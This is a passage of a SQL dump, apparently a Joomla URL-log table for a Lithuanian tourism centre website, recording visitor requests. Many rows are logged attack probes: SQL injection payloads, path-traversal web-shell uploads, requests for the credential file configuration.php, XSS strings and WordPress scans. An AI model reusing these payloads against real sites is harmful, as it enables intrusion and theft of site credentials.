RYhB&view=article&id=33&Itemid=196','','','',1,0,'2020-06-19 12:52:04','0000-00-00 00:00:00'),(3996,'http://infotytuvenai.lt/index.php/lt/?option=com_content ORDER BY 1-- LWzR&view=article&id=33&Itemid=196','','','',1,0,'2020-06-19 12:52:15','0000-00-00 00:00:00'),(3997,'http://infotytuvenai.lt/index.php/lt/?option=com_content UNION ALL SELECT NULL-- rToq&view=article&id=33&Itemid=196','','','',1,0,'2020-06-19 12:52:15','0000-00-00 00:00:00'),(3998,'http://infotytuvenai.lt/index.php/lt/?option=com_content UNION ALL SELECT NULL,NULL-- jetb&view=article&id=33&Itemid=196','','','',1,0,'2020-06-19 12:52:16','0000-00-00 00:00:00'),(3999,'http://infotytuvenai.lt/index.php/lt/?option=com_content UNION ALL SELECT NULL,NULL,NULL-- WvJr&view=article&id=33&Itemid=196','','','',1,0,'2020-06-19 12:52:16','0000-00-00 00:00:00'),(4000,'http://infotytuvenai.lt/index.php/lt/?option=com_content UNION ALL SELECT NULL,NULL,NULL,NULL-- sHVG&view=article&id=33&Itemid=196','','','',1,0,'2020-06-19 12:52:17','0000-00-00 00:00:00'),(4001,'http://infotytuvenai.lt/index.php/lt/?option=com_content UNION ALL SELECT NULL,NULL,NULL,NULL,NULL-- ZFNg&view=article&id=33&Itemid=196','','','',1,0,'2020-06-19 12:52:17','0000-00-00 00:00:00'),(4002,'http://infotytuvenai.lt/index.php/lt/?option=com_content UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL-- dtVm&view=article&id=33&Itemid=196','','','',1,0,'2020-06-19 12:52:18','0000-00-00 00:00:00'),(4003,'http://infotytuvenai.lt/index.php/lt/?option=com_content UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL-- WWQR&view=article&id=33&Itemid=196','','','',1,0,'2020-06-19 12:52:18','0000-00-00 00:00:00'),(4004,'http://infotytuvenai.lt/index.php/lt/?option=com_content UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- wbQZ&view=article&id=33&Itemid=196','','','',1,0,'2020-06-19 12:52:18','0000-00-00 00:00:00'),(4005,'http://infotytuvenai.lt/index.php/lt/?option=com_content UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- soNm&view=article&id=33&Itemid=196','','','',1,0,'2020-06-19 12:52:19','0000-00-00 00:00:00'),(4006,'http://infotytuvenai.lt/index.php/lt/?option=com_content UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- CVkP&view=article&id=33&Itemid=196','','','',1,0,'2020-06-19 12:52:19','0000-00-00 00:00:00'),(4007,'http://infotytuvenai.lt/index.php/lt/?option=com_content&view=article&id=(SELECT 6646 FROM(SELECT COUNT(*),CONCAT(0x7162767171,(SELECT (ELT(6646=6646,1))),0x717a626271,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)&Itemid=196','','','',1,0,'2020-06-19 12:53:28','0000-00-00 00:00:00'),(4008,'http://infotytuvenai.lt/index.php/lt/?option=com_content&view=article&id=(SELECT CONCAT(0x7162767171,(SELECT (ELT(3111=3111,1))),0x717a626271))&Itemid=196','','','',1,0,'2020-06-19 12:53:28','0000-00-00 00:00:00'),(4009,'http://infotytuvenai.lt/index.php/lt/?option=com_content&view=article&id=(SELECT (CHR(113)||CHR(98)||CHR(118)||CHR(113)||CHR(113))||(SELECT (CASE WHEN (2270=2270) THEN 1 ELSE 0 END))::text||(CHR(113)||CHR(122)||CHR(98)||CHR(98)||CHR(113)))&Itemid=196','','','',1,0,'2020-06-19 12:53:29','0000-00-00 00:00:00'),(4010,'http://infotytuvenai.lt/index.php/lt/?option=com_content&view=article&id=(SELECT CHAR(113)+CHAR(98)+CHAR(118)+CHAR(113)+CHAR(113)+(SELECT (CASE WHEN (7452=7452) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(122)+CHAR(98)+CHAR(98)+CHAR(113))&Itemid=196','','','',1,0,'2020-06-19 12:53:29','0000-00-00 00:00:00'),(4011,'http://infotytuvenai.lt/index.php/lt/?option=com_content&view=article&id=-7220) ORDER BY 1-- nWtu&Itemid=196','','','',1,0,'2020-06-19 12:53:36','0000-00-00 00:00:00'),(4012,'http://infotytuvenai.lt/index.php/lt/?option=com_content&view=article&id=-5197) UNION ALL SELECT 35-- YHIw&Itemid=196','','','',1,0,'2020-06-19 12:53:36','0000-00-00 00:00:00'),(4013,'http://infotytuvenai.lt/index.php/lt/?option=com_content&view=article&id=-9635) UNION ALL SELECT 35,35-- RaTA&Itemid=196','','','',1,0,'2020-06-19 12:53:37','0000-00-00 00:00:00'),(4014,'http://infotytuvenai.lt/index.php/lt/?option=com_content&view=article&id=-8193) UNION ALL SELECT 35,35,35-- DHHW&Itemid=196','','','',1,0,'2020-06-19 12:53:37','0000-00-00 00:00:00'),(4015,'http://infotytuvenai.lt/index.php/lt/?option=com_content&view=article&id=-2221) UNION ALL SELECT 35,35,35,35-- DqKZ&Itemid=196','','','',1,0,'2020-06-19 12:53:38','0000-00-00 00:00:00'),(4016,'http://infotytuvenai.lt/index.php/lt/?option=com_content&view=article&id=-2900) UNION ALL SELECT 35,35,35,35,35-- kIMe&Itemid=196','','','',1,0,'2020-06-19 12:53:38','0000-00-00 00:00:00'),(4017,'http://infotytuvenai.lt/index.php/lt/?option=com_content&view=article&id=-1682) UNION ALL SELECT 35,35,35,35,35,35-- UTzJ&Itemid=196','','','',1,0,'2020-06-19 12:53:39','0000-00-00 00:00:00'),(4018,'http://infotytuvenai.lt/index.php/lt/?option=com_content&view=article&id=-4160) UNION ALL SELECT 35,35,35,35,35,35,35-- HGCB&Itemid=196','','','',1,0,'2020-06-19 12:53:39','0000-00-00 00:00:00'),(4019,'http://infotytuvenai.lt/index.php/lt/?option=com_content&view=article&id=-3186) UNION ALL SELECT 35,35,35,35,35,35,35,35-- oDBi&Itemid=196','','','',1,0,'2020-06-19 12:53:40','0000-00-00 00:00:00'),(4020,'http://infotytuvenai.lt/index.php/lt/?option=com_content&view=article&id=-1838) UNION ALL SELECT 35,35,35,35,35,35,35,35,35-- Ksnh&Itemid=196','','','',1,0,'2020-06-19 12:53:40','0000-00-00 00:00:00'),(4021,'http://infotytuvenai.lt/index.php/lt/?option=com_content&view=article&id=-5199) UNION ALL SELECT 35,35,35,35,35,35,35,35,35,35-- qURa&Itemid=196','','','',1,0,'2020-06-19 12:53:41','0000-00-00 00:00:00'),(4022,'http://infotytuvenai.lt/index.php/lt/?option=com_content&view=article&id=-2873 ORDER BY 1-- CWlq&Itemid=196','','','',1,0,'2020-06-19 12:53:41','0000-00-00 00:00:00'),(4023,'http://infotytuvenai.lt/index.php/lt/?option=com_content&view=article&id=-9102 UNION ALL SELECT 35-- ZQFF&Itemid=196','','','',1,0,'2020-06-19 12:53:42','0000-00-00 00:00:00'),(4024,'http://infotytuvenai.lt/index.php/lt/?option=com_content&view=article&id=-8765 UNION ALL SELECT 35,35-- lnyL&Itemid=196','','','',1,0,'2020-06-19 12:53:42','0000-00-00 00:00:00'),(4025,'http://infotytuvenai.lt/index.php/lt/?option=com_content&view=article&id=-5127 UNION ALL SELECT 35,35,35-- WWjA&Itemid=196','','','',1,0,'2020-06-19 12:53:42','0000-00-00 00:00:00'),(4026,'http://infotytuvenai.lt/index.php/lt/?option=com_content&view=article&id=-8896 UNION ALL SELECT 35,35,35,35-- ASFf&Itemid=196','','','',1,0,'2020-06-19 12:53:43','0000-00-00 00:00:00'),(4027,'http://infotytuvenai.lt/index.php/lt/?option=com_content&view=article&id=-6218 UNION ALL SELECT 35,35,35,35,35-- WUuT&Itemid=196','','','',1,0,'2020-06-19 12:53:43','0000-00-00 00:00:00'),(4028,'http://infotytuvenai.lt/index.php/lt/?option=com_content&view=article&id=-1697 UNION ALL SELECT 35,35,35,35,35,35-- fqtg&Itemid=196','','','',1,0,'2020-06-19 12:53:44','0000-00-00 00:00:00'),(4029,'http://infotytuvenai.lt/index.php/lt/?option=com_content&view=article&id=-8971 UNION ALL SELECT 35,35,35,35,35,35,35-- UxZA&Itemid=196','','','',1,0,'2020-06-19 12:53:44','0000-00-00 00:00:00'),(4030,'http://infotytuvenai.lt/index.php/lt/?option=com_content&view=article&id=-8929 UNION ALL SELECT 35,35,35,35,35,35,35,35-- puQK&Itemid=196','','','',1,0,'2020-06-19 12:53:45','0000-00-00 00:00:00'),(4031,'http://infotytuvenai.lt/index.php/lt/?option=com_content&view=article&id=-5318 UNION ALL SELECT 35,35,35,35,35,35,35,35,35-- oNRj&Itemid=196','','','',1,0,'2020-06-19 12:53:45','0000-00-00 00:00:00'),(4032,'http://infotytuvenai.lt/index.php/lt/?option=com_content&view=article&id=-6551 UNION ALL SELECT 35,35,35,35,35,35,35,35,35,35-- Yktn&Itemid=196','','','',1,0,'2020-06-19 12:53:46','0000-00-00 00:00:00'),(4033,'http://infotytuvenai.lt/index.php/lt/?option=com_content&view=article&id=-9104 ORDER BY 1-- cAnD&Itemid=196','','','',1,0,'2020-06-19 12:53:46','0000-00-00 00:00:00'),(4034,'http://infotytuvenai.lt/index.php/lt/?option=com_content&view=article&id=-7428 UNION ALL SELECT 35-- cWzU&Itemid=196','','','',1,0,'2020-06-19 12:53:47','0000-00-00 00:00:00'),(4035,'http://infotytuvenai.lt/index.php/lt/?option=com_content&view=article&id=-8985 UNION ALL SELECT 35,35-- mOcS&Itemid=196','','','',1,0,'2020-06-19 12:53:47','0000-00-00 00:00:00'),(4036,'http://infotytuvenai.lt/index.php/lt/?option=com_content&view=article&id=-7676 UNION ALL SELECT 35,35,35-- omJa&Itemid=196','','','',1,0,'2020-06-19 12:53:48','0000-00-00 00:00:00'),(4037,'http://infotytuvenai.lt/index.php/lt/?option=com_content&view=article&id=-9982 UNION ALL SELECT 35,35,35,35-- qhrb&Itemid=196','','','',1,0,'2020-06-19 12:53:48','0000-00-00 00:00:00'),(4038,'http://infotytuvenai.lt/index.php/lt/?option=com_content&view=article&id=-9503 UNION ALL SELECT 35,35,35,35,35-- zpQU&Itemid=196','','','',1,0,'2020-06-19 12:53:49','0000-00-00 00:00:00'),(4039,'http://infotytuvenai.lt/index.php/lt/?option=com_content&view=article&id=-4185 UNION ALL SELECT 35,35,35,35,35,35-- rDLz&Itemid=196','','','',1,0,'2020-06-19 12:53:49','0000-00-00 00:00:00'),(4040,'http://infotytuvenai.lt/index.php/lt/?option=com_content&view=article&id=-3402 UNION ALL SELECT 35,35,35,35,35,35,35-- MYeY&Itemid=196','','','',1,0,'2020-06-19 12:53:50','0000-00-00 00:00:00'),(4041,'http://infotytuvenai.lt/index.php/lt/?option=com_content&view=article&id=-2124 UNION ALL SELECT 35,35,35,35,35,35,35,35-- mekz&Itemid=196','','','',1,0,'2020-06-19 12:53:50','0000-00-00 00:00:00'),(4042,'http://infotytuvenai.lt/index.php/lt/?option=com_content&view=article&id=-1083 UNION ALL SELECT 35,35,35,35,35,35,35,35,35-- pWJc&Itemid=196','','','',1,0,'2020-06-19 12:53:51','0000-00-00 00:00:00'),(4043,'http://infotytuvenai.lt/index.php/lt/?option=com_content&view=article&id=-8399 UNION ALL SELECT 35,35,35,35,35,35,35,35,35,35-- GHsx&Itemid=196','','','',1,0,'2020-06-19 12:53:51','0000-00-00 00:00:00'),(4044,'http://www.infotytuvenai.lt/index.php/lt/maitinimas/gedulingi-pietus','','','',72,0,'2020-06-22 10:15:46','0000-00-00 00:00:00'),(4045,'http://infotytuvenai.lt/index.php/lt/component/content/article/44-paskutinesnaujienos/338-naujas-darbo-laikas','','','',24,0,'2020-06-23 03:06:38','0000-00-00 00:00:00'),(4046,'http://www.infotytuvenai.lt/index.php/lt/apie-centra/galerija','','','',56,0,'2020-06-26 03:19:59','0000-00-00 00:00:00'),(4047,'http://www.infotytuvenai.lt/index.php/lt/component/content/article/44-paskutinesnaujienos/338-naujas-darbo-laikas','','','',6,0,'2020-06-27 05:18:19','0000-00-00 00:00:00'),(4048,'http://infotytuvenai.lt/index.php/lt/?option=com_b2jcontact&view=loader&type=uploader&owner=component&bid=1&qqfile=/../../../Raiz0WorM_1594576374.php','','','',1,0,'2020-07-12 18:51:20','0000-00-00 00:00:00'),(4049,'http://www.infotytuvenai.lt/index.php/lt/?option=com_fabrik&c=import&view=import&filetype=csv&table=','','','',2,0,'2020-07-15 14:26:51','0000-00-00 00:00:00'),(4050,'http://www.infotytuvenai.lt/index.php/lt/?option=com_jdownloads&Itemid=0&view=upload','','','',2,0,'2020-07-15 14:28:14','0000-00-00 00:00:00'),(4051,'http://www.infotytuvenai.lt/index.php/lt/?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&method=form','','','',2,0,'2020-07-15 14:28:16','0000-00-00 00:00:00'),(4052,'http://www.infotytuvenai.lt/index.php/lt/?option=com_fabrik&c=import&view=import&filetype=csv&table=1','','','',2,0,'2020-07-15 14:28:30','0000-00-00 00:00:00'),(4054,'http://infotytuvenai.lt/index.php/lt/forum.php','','','',1,0,'2020-07-24 05:52:34','0000-00-00 00:00:00'),(4055,'http://infotytuvenai.lt/index.php/lt/?option=com_b2jcontact&view=loader&type=uploader&owner=component&bid=1&qqfile=/../../../Raiz0WorM_1595794263.php','','','',1,0,'2020-07-26 20:16:02','0000-00-00 00:00:00'),(4056,'http://infotytuvenai.lt/index.php/lt/?option=com_b2jcontact&view=loader&type=uploader&owner=component&bid=1&qqfile=/../../../Raiz0WorM_159586504.php','','','',1,0,'2020-07-27 15:57:08','0000-00-00 00:00:00'),(4057,'http://infotytuvenai.lt/index.php/lt/?option=com_b2jcontact&view=loader&type=uploader&owner=component&bid=1&qqfile=/../../../RxR_1595937149.php','','','',1,0,'2020-07-28 12:44:41','0000-00-00 00:00:00'),(4058,'http://infotytuvenai.lt/index.php/lt/?option=com_b2jcontact&view=loader&type=uploader&owner=component&bid=1&qqfile=/../../../Raiz0WorM_1595946575.php','','','',1,0,'2020-07-28 14:45:09','0000-00-00 00:00:00'),(4059,'http://infotytuvenai.lt/index.php/lt/?option=com_content.),,,\'\"(((&view=article&id=306','','','',1,0,'2020-08-05 00:04:09','0000-00-00 00:00:00'),(4060,'http://infotytuvenai.lt/index.php/lt/?option=com_content\'gHDxtJ<\'\">UcbXSS&view=article&id=306','','','',1,0,'2020-08-05 00:04:12','0000-00-00 00:00:00'),(4061,'http://infotytuvenai.lt/index.php?option=com_adsmanager&task=upload&Resultl=component','','','',1,0,'2020-08-06 07:13:05','0000-00-00 00:00:00'),(4062,'http://infotytuvenai.lt/index.php/lt/?option=com_tag&controller=tag&task=add&article_id=-2','','','',1,0,'2020-08-17 07:53:45','0000-00-00 00:00:00'),(4063,'http://infotytuvenai.lt/index.php/lt/?option=com_b2jcontact&view=loader&type=uploader&owner=component&bid=1&qqfile=/../../../Raiz0WorM_1597966648.php','','','',1,0,'2020-08-20 23:41:42','0000-00-00 00:00:00'),(4064,'http://infotytuvenai.lt/index.php/lt/apie-centra; info@infotytuvenai.lt','','','',1,0,'2020-08-22 10:35:29','0000-00-00 00:00:00'),(4065,'http://infotytuvenai.lt/index.php/lt/?option=com_breezingforms&tmpl=component','','','',1,0,'2020-08-28 22:04:10','0000-00-00 00:00:00'),(4066,'http://infotytuvenai.lt/index.php/lt/?option=com_hdflvplayer','','','',1,0,'2020-08-28 22:04:11','0000-00-00 00:00:00'),(4067,'http://infotytuvenai.lt/index.php/lt/?option=com_dtregister','','','',1,0,'2020-08-28 22:04:12','0000-00-00 00:00:00'),(4068,'http://infotytuvenai.lt/index.php/lt/?option=com_alphacontent','','','',1,0,'2020-08-28 22:04:13','0000-00-00 00:00:00'),(4069,'http://infotytuvenai.lthttp//infotytuvenai.lt/index.php','','','',1,0,'2020-09-01 16:56:23','0000-00-00 00:00:00'),(4070,'http://www.infotytuvenai.lt/index.php/lt/wp-content/plugins/drag-and-drop-multiple-file-upload-contact-form-7/readme.txt','','','',1,0,'2020-09-04 15:33:29','0000-00-00 00:00:00'),(4071,'http://infotytuvenai.lt/index.php/lt/?option=com_b2jcontact&view=loader&type=uploader&owner=component&bid=1&qqfile=/../../../Raiz0WorM_159946827.php','','','',1,0,'2020-09-06 18:53:46','0000-00-00 00:00:00'),(4072,'http://www.infotytuvenai.lt/index.php/lt/images/presets/preset3/logo.png','','http://www.infotytuvenai.lt/index.php/lt/turizmo-informacija/kurtuvenu-regioninis-parkas','',1,0,'2020-09-26 17:21:12','0000-00-00 00:00:00'),(4073,'http://infotytuvenai.lt/index.php/lt/index.php?option=com_b2jcontact&view=loader&type=uploader&owner=component&bid=1&qqfile=/../../../shin.php','','','',1,0,'2020-10-04 19:55:16','0000-00-00 00:00:00'),(4074,'http://infotytuvenai.lt/index.php/lt/turizmo-informacija/turizmo-informacija/dubysos-regioninis-parkas','','http://infotytuvenai.lt/index.php/lt/turizmo-informacija/turizmo-informacija/dubysos-regioninis-parkas','',4,0,'2020-10-28 16:02:41','0000-00-00 00:00:00'),(4075,'http://infotytuvenai.lt/index.php/lt/?option=com_fabrik&controller=./configuration.php','','','',2,0,'2020-10-30 14:34:17','0000-00-00 00:00:00'),(4076,'http://infotytuvenai.lt/index.php/lt/?option=com_rsfiles&task=download&path=./configuration.php','','','',2,0,'2020-10-30 14:34:18','0000-00-00 00:00:00'),(4077,'http://infotytuvenai.lt//index.php?option=com_gmapfp&controller=editlieux&tmpl=component&task=upload_image','','','',36,0,'2020-10-31 14:38:52','0000-00-00 00:00:00'),(4078,'http://www.infotytuvenai.lt//index.php?option=com_gmapfp&controller=editlieux&tmpl=component&task=upload_image','','','',24,0,'2020-10-31 14:41:06','0000-00-00 00:00:00'),(4079,'http://infotytuvenai.lt/index.php/lt/?option=com_easyshop&task=ajax.loadImage&file=Li9jb25maWd1cmF0aW9uLnBocA==','','','',2,0,'2020-11-01 10:03:17','0000-00-00 00:00:00'),(4080,'http://infotytuvenai.lt/index.php/lt/?option=com_jssupportticket&c=ticket&task=downloadbyname&id=0&name=../../../configuration.php','','','',2,0,'2020-11-01 10:03:18','0000-00-00 00:00:00'),(4081,'http://infotytuvenai.lt/index.php/lt/?option=com_jifile&task=filesystem.download&filename=configuration.php','','','',2,0,'2020-11-01 10:03:19','0000-00-00 00:00:00'),(4082,'http://infotytuvenai.lt/index.php/lt/?option=com_jtagmembersdirectory&task=attachment&download_file=configuration.php','','','',2,0,'2020-11-01 10:03:21','0000-00-00 00:00:00'),(4083,'http://infotytuvenai.lt/index.php/lt/?option=com_helpdeskpro&task=ticket.download_attachment&filename=configuration.php&original_filename=mp.exe','','','',2,0,'2020-11-01 10:03:22','0000-00-00 00:00:00'),(4084,'http://infotytuvenai.lt/','','','',10,0,'2020-11-03 01:33:55','0000-00-00 00:00:00'),(4085,'http://infotytuvenai.lt/index.php?option=com_gmapfp&controller=editlieux&tmpl=component&task=upload_image','','','',25,0,'2020-11-03 12:27:55','0000-00-00 00:00:00'),(4086,'http://www.infotytuvenai.lt/index.php/lt/lankytini-objektai/favicon.ico','','','',1,0,'2020-11-07 19:21:31','0000-00-00 00:00:00'),(4087,'http://infotytuvenai.lt/index.php/lt/ZOyfLG7taIKh/4IoR4CPyerIElwBE6/yCEQ0wHPGKx3','','','',1,0,'2020-11-07 19:51:02','0000-00-00 00:00:00'),(4088,'http://www.infotytuvenai.lt/index.php/lt/?option=com_contentview=articleid=305','','','',1,0,'2020-11-11 20:21:22','0000-00-00 00:00:00'),(4089,'http://www.infotytuvenai.lt/index.php/lt/?option=com_contentview=articleid=306','','','',1,0,'2020-11-11 20:27:10','0000-00-00 00:00:00'),(4090,'http://infotytuvenai.lt/index.php/lt/?option=com_contentview=articleid=305','','','',1,0,'2020-11-12 22:18:49','0000-00-00 00:00:00'),(4091,'http://infotytuvenai.lt/index.php/lt/?option=com_contentview=articleid=306','','','',1,0,'2020-11-12 22:31:52','0000-00-00 00:00:00'),(4092,'http://www.infotytuvenai.lt/index.php?option=com_gmapfp&controller=editlieux&tmpl=component&task=upload_image','','','',3,0,'2020-11-13 12:03:26','0000-00-00 00:00:00'),(4093,'http://www.infotytuvenai.lt/','','','',2,0,'2020-11-13 12:46:26','0000-00-00 00:00:00'),(4094,'http://infotytuvenai.lt/index.php/lt/index.php/lt/index.php/lt/index.php/lt/index.php/lt/index.php/lt/index.php/lt/index.php/lt/index.php/lt/index.php/lt/index.php/lt/index.php/lt/index.php/lt/index.php/lt/index.php/lt/index.php/lt/index.php/lt/index.php/','','http://infotytuvenai.lt/','',1,0,'2020-11-13 23:27:53','0000-00-00 00:00:00'),(4095,'http://infotytuvenai.lt/index.php/lt/?option=com_jdownloads&Itemid=1&view=upload','','','',2,0,'2020-11-27 18:25:54','0000-00-00 00:00:00'),(4096,'http://infotytuvenai.lt/index.php/lt/?option=com_gmapfp&controller=editlieux&tmpl=component&task=upload_image','','','',1,0,'2020-11-28 18:08:19','0000-00-00 00:00:00'),(4097,'http://infotytuvenai.lt/index.php/lt/turizmo-informacija/turizmo-informacija/turizmo-informacija/dubysos-regioninis-parkas','','http://infotytuvenai.lt/index.php/lt/turizmo-informacija/turizmo-informacija/turizmo-informacija/dubysos-regioninis-parkas','',1,0,'2020-12-10 12:54:02','0000-00-00 00:00:00'),(4098,'http://infotytuvenai.lt/index.php/lt/?option=com_b2jcontact&view=loader&type=uploader&owner=component&bid=1&qqfile=/../../../Raiz0WorM_1608503459.php','','','',1,0,'2020-12-21 00:22:28','0000-00-00 00:00:00'),(4099,'http://www.infotytuvenai.lt/index.php/lt/images/apgyvendinimas.jpg','','','',1,0,'2020-12-22 12:05:49','0000-00-00 00:00:00'),(4100,'http://www.infotytuvenai.lt/index.php/lt/images/stories/naujienos/adventure2020/main.jpg','','','',1,0,'2020-12-22 12:05:50','0000-00-00 00:00:00'),(4101,'http://www.infotytuvenai.lt/index.php/lt/images/stories/naujienos/mobili_programele/apps.png','','','',1,0,'2020-12-22 12:05:50','0000-00-00 00:00:00'),(4102,'https://www.infotytuvenai.lt/index.php/lt/?Itemid=124&id=21:paslaugu-atnaujinimo-planas&option=com_k2&view=item','','','',1,0,'2021-01-30 21:31:40','0000-00-00 00:00:00'),(4103,'https://infotytuvenai.lt/index.php/lt/?Itemid=124&id=22:svarbi-informacija&option=com_k2&view=item','','','',1,0,'2021-01-31 00:39:32','0000-00-00 00:00:00'),(4104,'https://www.infotytuvenai.lt/index.php/lt/?option=com_content&view=article&id=57','','','',55,0,'2021-01-31 01:09:13','0000-00-00 00:00:00'),(4105,'https://infotytuvenai.lt/index.php/lt/?Itemid=217&catid=13&id=68:strategija&option=com_content&view=article','','','',1,0,'2021-01-31 03:24:14','0000-00-00 00:00:00'),(4106,'https://infotytuvenai.lt/index.php/lt/?catid=9:extensions&id=5:hot-maps&option=com_content&view=article','','','',1,0,'2021-01-31 04:28:11','0000-00-00 00:00:00'),(4107,'https://www.infotytuvenai.lt/index.php/lt/apgyvendinimas/kaimo-turizmas','','','',121,0,'2021-01-31 05:17:29','0000-00-00 00:00:00'),(4108,'https://www.infotytuvenai.lt/index.php/lt/?option=com_user&view=register','','https://www.infotytuvenai.lt/index.php/lt/?option=com_user&view=register','',9698,0,'2021-01-31 05:45:33','0000-00-00 00:00:00'),(4109,'https://www.infotytuvenai.lt/index.php/lt/13-sample-data-article/demo/features/31-renginiai','','','',104,0,'2021-01-31 06:30:55','0000-00-00 00:00:00'),(4110,'https://www.infotytuvenai.lt/index.php/lt/tytuvenu-festivalis/kontaktai','','','',48,0,'2021-01-31 07:07:38','0000-00-00 00:00:00'),(4111,'https://www.infotytuvenai.lt/index.php/lt/tytuvenu-festivalis/naujienos','','','',64,0,'2021-01-31 07:52:48','0000-00-00 00:00:00'),(4112,'https://www.infotytuvenai.lt/index.php/lt/apie-centra/suvenyrai','','','',81,0,'2021-01-31 08:57:49','0000-00-00 00:00:00'),(4113,'https://www.infotytuvenai.lt/index.php/lt/?option=com_k2&view=itemlist&layout=category&task=category&id=9&Itemid=124','','','',39,0,'2021-01-31 08:58:23','0000-00-00 00:00:00'),(4114,'https://www.infotytuvenai.lt/index.php/lt/?option=com_content&view=category&id=13&Itemid=197','','','',46,0,'2021-01-31 09:22:23','0000-00-00 00:00:00'),(4115,'https://www.infotytuvenai.lt/index.php/lt/apie-centra/favicon.ico','','','',1,0,'2021-01-31 09:31:59','0000-00-00 00:00:00'),(4116,'https://www.infotytuvenai.lt/index.php/lt/lankytini-objektai/gamtos-paminklai','','','',5,0,'2021-01-31 11:51:12','0000-00-00 00:00:00'),(4117,'https://infotytuvenai.lt/index.php/lt/?catid=2:uncategorised&id=43:2014-m-finansines-ataskaitos&option=com_content&view=article','','','',1,0,'2021-01-31 14:36:40','0000-00-00 00:00:00'),(4118,'https://www.infotytuvenai.lt/index.php/lt/component/content/article/31-apie-centra/321-maitinimo-meniu','','','',1,0,'2021-01-31 14:40:57','0000-00-00 00:00:00'),(4119,'https://www.infotytuvenai.lt/index.php/lt//wp-includes/wlwmanifest.xml','','','',218,0,'2021-01-31 15:00:47','0000-00-00 00:00:00'),(4120,'https://www.infotytuvenai.lt/index.php/lt//xmlrpc.php?rsd','','','',223,0,'2021-01-31 15:00:48','0000-00-00 00:00:00'),(4121,'https://www.infotytuvenai.lt/index.php/lt//blog/wp-includes/wlwmanifest.xml','','','',223,0,'2021-01-31 15:00:49','0000-00-00 00:00:00'),(4122,'https://www.infotytuvenai.lt/index.php/lt//web/wp-includes/wlwmanifest.xml','','','',224,0,'2021-01-31 15:00:50','0000-00-00 00:00:00'),(4123,'https://www.infotytuvenai.lt/index.php/lt//wordpress/wp-includes/wlwmanifest.xml','','','',223,0,'2021-01-31 15:00:50','0000-00-00 00:00:00'),(4124,'https://www.infotytuvenai.lt/index.php/lt//website/wp-includes/wlwmanifest.xml','','','',221,0,'2021-01-31 15:00:51','0000-00-00 00:00:00'),(4125,'https://www.infotytuvenai.lt/index.php/lt//wp/wp-includes/wlwmanifest.xml','','','',224,0,'2021-01-31 15:00:51','0000-00-00 00:00:00'),(4126,'https://www.infotytuvenai.lt/index.php/lt//news/wp-includes/wlwmanifest.xml','','','',221,0,'2021-01-31 15:00:52','0000-00-00 00:00:00'),(4127,'https://www.infotytuvenai.lt/index.php/lt//2018/wp-includes/wlwmanifest.xml','','','',94,0,'2021-01-31 15:00:52','0000-00-00 00:00:00'),(4128,'https://www.infotytuvenai.lt/index.php/lt//2019/wp-includes/wlwmanifest.xml','','','',194,0,'2021-01-31 15:00:53','0000-00-00 00:00:00'),(4129,'https://www.infotytuvenai.lt/index.php/lt//shop/wp-includes/wlwmanifest.xml','','','',198,0,'2021-01-31 15:00:53','0000-00-00 00:00:00'),(4130,'https://www.infotytuvenai.lt/index.php/lt//wp1/wp-includes/wlwmanifest.xml','','','',223,0,'2021-01-31 15:00:54','0000-00-00 00:00:00'),(4131,'https://www.infotytuvenai.lt/index.php/lt//test/wp-includes/wlwmanifest.xml','','','',223,0,'2021-01-31 15:00:54','0000-00-00 00:00:00'),(4132,'https://www.infotytuvenai.lt/index.php/lt//media/wp-includes/wlwmanifest.xml','','','',94,0,'2021-01-31 15:00:55','0000-00-00 00:00:00'),(4133,'https://www.infotytuvenai.lt/index.php/lt//wp2/wp-includes/wlwmanifest.xml','','','',221,0,'2021-01-31 15:00:56','0000-00-00 00:00:00'),(4134,'https://www.infotytuvenai.lt/index.php/lt//site/wp-includes/wlwmanifest.xml','','','',224,0,'2021-01-31 15:00:56','0000-00-00 00:00:00'),(4135,'https://www.infotytuvenai.lt/index.php/lt//cms/wp-includes/wlwmanifest.xml','','','',223,0,'2021-01-31 15:00:57','0000-00-00 00:00:00'),(4136,'https://www.infotytuvenai.lt/index.php/lt//sito/wp-includes/wlwmanifest.xml','','','',221,0,'2021-01-31 15:00:57','0000-00-00 00:00:00'),(4137,'https://www.infotytuvenai.lt/index.php/lt/component/content/category/47-piligrimai/piligrimai','','','',51,0,'2021-01-31 16:13:49','0000-00-00 00:00:00'),(4138,'https://infotytuvenai.lt/index.php/lt/?catid=14&id=65:antra-naujiena&option=com_content&view=article','','','',1,0,'2021-01-31 17:44:05','0000-00-00 00:00:00'),(4139,'https://www.infotytuvenai.lt/index.php/lt/?option=com_content&view=article&id=38&Itemid=202','','','',52,0,'2021-01-31 17:49:20','0000-00-00 00:00:00'),(4140,'https://www.infotytuvenai.lt/index.php/lt/apgyvendinimas/apgyvendinimas','','','',37,0,'2021-01-31 18:02:02','0000-00-00 00:00:00'),(4141,'https://www.infotytuvenai.lt/index.php/lt/?option=com_k2&view=item&id=12:isankstine-registracija&Itemid=124','','','',52,0,'2021-01-31 19:37:09','0000-00-00 00:00:00'),(4142,'https://www.infotytuvenai.lt/index.php/lt/?option=com_k2&view=item&id=16:covid-19-identifikavimas&Itemid=124','','','',54,0,'2021-01-31 19:41:58','0000-00-00 00:00:00'),(4143,'https://www.infotytuvenai.lt/index.php/lt/component/content/category/43-apie-centra/general','','','',53,0,'2021-01-31 20:14:22','0000-00-00 00:00:00'),(4144,'https://www.infotytuvenai.lt/index.php/lt/component/content/category/56-tytuvenu-festivalis/naujienos','','','',47,0,'2021-01-31 20:14:56','0000-00-00 00:00:00'),(4145,'https://www.infotytuvenai.lt/index.php/lt/component/content/category/51-vienuolynas/vienuolynas','','','',59,0,'2021-01-31 20:15:56','0000-00-00 00:00:00'),(4146,'https://www.infotytuvenai.lt/index.php/lt/component/content/category/41-apie-centra/projektai','','','',52,0,'2021-01-31 20:16:27','0000-00-00 00:00:00'),(4147,'https://www.infotytuvenai.lt/index.php/lt/?option=com_jdownloads&Itemid=0&view=upload','','','',418,0,'2021-01-31 22:33:35','0000-00-00 